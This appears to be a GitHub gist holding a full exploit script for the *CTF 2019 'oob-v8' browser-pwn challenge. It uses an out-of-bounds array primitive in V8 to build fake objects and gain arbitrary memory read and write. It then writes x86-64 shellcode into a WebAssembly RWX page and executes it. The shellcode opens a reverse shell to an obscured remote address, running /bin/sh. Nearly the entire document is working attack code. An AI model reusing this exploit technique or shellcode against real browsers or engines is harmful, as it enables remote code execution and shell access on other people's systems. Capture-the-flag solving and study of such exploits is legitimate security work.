Skip to content

Instantly share code, notes, and snippets.

@wbowling
Last active Apr 20, 2021
Embed
What would you like to do?
starCTF (*CTF) 2019 oob-v8
// uses https://github.com/saelo/jscpwn/blob/master/utils.js
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
let f = wasm_mod.exports.hello;
var arr1 = [1.1];
var arr2 = [Date];
var arr_map1 = arr1.oob();
var arr_map2 = arr2.oob();
print(arr_map1);
print(Int64.fromDouble(arr_map1));
print(Int64.fromDouble(arr_map2));
var fake_arr = [
arr_map1,
0,
arr_map2,
new Int64("0x1000000000000").asDouble()
];
var ab = new ArrayBuffer(0x41);
var leak_arr = [fake_arr, ab, wasm_mod];
leak_arr.oob(arr_map1);
var fake_arr_addr = Int64.fromDouble(leak_arr[0]);
var ab_addr = Int64.fromDouble(leak_arr[1]);
let wasm_mod_addr = Int64.fromDouble(leak_arr[2]);
print("ab_addr: " + ab_addr);
print(fake_arr_addr);
print(new Int64(fake_arr_addr- -0x30));
var arr3 = [Date];
arr3.oob(arr_map1);
arr3[0] = new Int64(fake_arr_addr- -0x30).asDouble()
arr3.oob(arr_map2);
print(arr3[0].length);
fake_arr[2] = new Int64(ab_addr).asDouble();
oob_array = arr3[0];
function read(addr, size) {
oob_array[1] = new Int64(size).asDouble()
oob_array[2] = new Int64(addr).asDouble()
let a = new Uint8Array(ab, 0, size);
return Array.from(a);
}
function write(addr, bytes) {
oob_array[1] = new Int64(bytes.length).asDouble()
oob_array[2] = new Int64(addr).asDouble()
let a = new Uint8Array(ab);
a.set(bytes);
}
function read64(addr) {
var a = read(addr, 8);
return new Int64(a)
}
console.log("wasm_mod_addr", wasm_mod_addr);
rwx = read64(wasm_mod_addr-1+8*17)
console.log("rwx", rwx);
let shellcode = [
0x6a, 0x29, 0x58, 0x6a, 0x2, 0x5f, 0x6a, 0x1, 0x5e, 0x99, 0xf, 0x5, 0x48, 0x89, 0xc5, 0x48, 0xb8, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x50, 0x48, 0xb8, 0x3, 0x1, 0x31, 0x38, 0x66, 0x2, 0x3c, 0x88, 0x48, 0x31, 0x4, 0x24, 0x6a, 0x2a, 0x58, 0x48, 0x89, 0xef, 0x6a, 0x10, 0x5a, 0x48, 0x89, 0xe6, 0xf, 0x5,
0x6a, 0x3, 0x5e, 0x48, 0xff, 0xce, 0x78, 0xb, 0x56, 0x6a, 0x21, 0x58, 0x48, 0x89, 0xef, 0xf, 0x5, 0xeb, 0xef, 0x6a, 0x68, 0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x2f, 0x73, 0x50, 0x48, 0x89, 0xe7, 0x68, 0x72, 0x69, 0x1, 0x1, 0x81, 0x34, 0x24, 0x1, 0x1, 0x1, 0x1, 0x31, 0xf6, 0x56, 0x6a, 0x8, 0x5e, 0x48, 0x1, 0xe6, 0x56, 0x48, 0x89, 0xe6, 0x31, 0xd2, 0x6a, 0x3b, 0x58, 0xf, 0x5,
];
write(rwx, shellcode);
f();
alert();
// *CTF{D1d_y0u_p0p_4_calc_f0r_fun :P}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment